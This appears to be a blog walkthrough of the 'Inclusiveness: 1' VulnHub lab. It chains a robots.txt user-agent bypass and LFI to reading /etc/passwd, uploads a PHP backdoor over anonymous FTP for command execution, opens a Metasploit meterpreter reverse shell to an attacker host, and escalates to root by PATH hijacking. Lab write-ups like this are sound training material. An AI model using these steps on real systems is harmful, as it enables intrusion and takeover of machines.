Inclusiveness OffSec Walkthrough: Another walkthrough for the vulnhub machine “INCLUSIVENESS: 1” which is an Intermediate level lab designed by the author “h4sh5 & Richard Lee” to give a taste to the OSCP Labs. The challenge is same just like any other CTF challenge where you identify the flag with the help of your pentest skill. Its Available in OffSec Play and Vulnhub.
Penetration Testing Methodologies
Network Scanning
- Netdiscover
- nmap
Enumeration
- txt
- User-agent restriction bypass
- LFI
Exploiting LFI
- LFI To RCE
Privilege Escalation
- Abusing PATH Variable
Network Scanning
So, as we always start with netdiscover to get the IP of the VM machine and the IP of the host I’ve found is 192.168.29.151.
Let’s proceed with network scan using Nmap aggressive scan as given below.
nmap -p- -A 192168.29.151And as a result, we find that port 21 is open for FTP where anonymous login has been allowed and the directory name as /pub is writeable, and port 80 and 22 are also accessible for HTTP and SSH respectively.
Enumeration
To find any loopholes we need to list more, so we’re browsing the host IP in the web browser, but unfortunately, they were found only the “Apache2 Debian Default page.”
Instead we try to check for the robots.txt file and, as a result, the message “You are not a search engine!” is shown. You can’t read my robots.txt!
Without wasting time, I try to bypass this restriction by editing a new user agent in my firefox using the following steps:
- Inside the URL tab search for “about:config”
- Then search for preference Name: useragnet
- Make a right click then > New > String
You get a dialog box; enter the preference name “general.useragent.overriide” as shown in the below image.
Enter the string value to provide useragent “GoogleBot”.
Once the above steps have been completed, the record will be shown for your new edit preference.
Now reload the URL for /robots.txt page and you will be able to read the disallowed entry as “/secret_informtion/” as shown below.
So, we’ve explored /secret_information, it brings a web page that describes “DNS Zone Transfer Attack” and the web page contains two hyperlinks “English & Spanish.”
As I click on the “English” hyperlink, I found that it was calling the en.php via lang parameter in the URL, which means that there could be possibilities for LFI.
Therefore, I try to get /etc/passwd file by abusing the php include of the webpage and as result I got the whole contents of the /etc/passwd file as shown in the below image.
Exploiting LFI
So, it was time to exploit the vulnerability of the LFI by injecting a malicious file and, as you know, the FTP service is available as anonymous and / pub is a writable directory.
We then try to read the “vsftpd.conf” FTP config file by abusing LFI to enumerate the writeable directory path.
We’ve prepared a php file that contains a malicious code that will further trigger remote command execution vulnerabilities.
Now it’s time to upload the malicious file “backdoor.php” on the host machine via ftp, thus follow the below commands
ftp 192.168.29.151
cd /pub
put backdoor.php
Further, we need to run the uploaded file to execute the malicious code by executing the following:
http://192.168.29.151/secret_information/?/lang=var/ftp/pub/backdoor.php&cmd=idUsing the URL above, try to run the backdoor.php file and simultaneously run the OS command “Id” as shown in the image provided here.
As we have been successful in inducing RCE in the installed application by abusing LFI, we are continuing with Metasploit’s “web delivery” Module to compromise the host machine in order to obtain a reverse connection.
use/exploit/multi/script/web_delivery
set target 1 <php>
set lhost 192.168.29.208
set payload php/meterpreter/reverse_tcp
exploitThis will generate a malicious PHP code which you’ll use for execution on the web URL as done above.
So, I copied the above malicious code and paste it inside the URL to get the back connection of the host through the URL execution.
Privilege Escalation
Booom!!! We hit the goal and obtain the meterperter session the host machine, since it was boot to root CTF, we need to escalate the root privilege shell, therefore we try to identify all programs or files that have SUID bits enabled.
So, with the help of find command, we’ve got a list of programs running as a superuser that unlocks the SUID bit where I notice /home/tom/rootshell.
Inside /root/tom/ I found rootshell.c file and a compile file rootshell that owns SUID permissions.
According this piece of code if the file is executed as Tom user by calling the function for “whoami” program for validation then you will get a privilege shell else it will print user-ID that is currently logged in will be displayed.
In simple words the rootshell program give a high privilege shell if the output of whoami program will be “tom”.
You can easily take advantage of this configuration by abusing the PATH system. Here, we built a file as “whoami” in the / tmp directory, and write the following bash code to print “tom”
cd /tmp
echo "printf "tom"" > whoami
chmod 777 whoamiAdd a temporary path variable with the help of the following command. you will observe that we had added /tmp as PATH variable.
export PATH=/tmp:$PATH
echo pathwhen all is done then the rootshell to get the root privilege shell just we have obtained here as to shown below.
cd /home/tom
./rootshell
cd /root
cat flag.txtFinally, we have found the root shell a flag.txt file, this lab has a good combination of basic vulnerability of Web and OS privilege Escalation.
Finally this lab solve see you on next lab 😉
Also Read | Empire-breakout OffSec Walkthrough
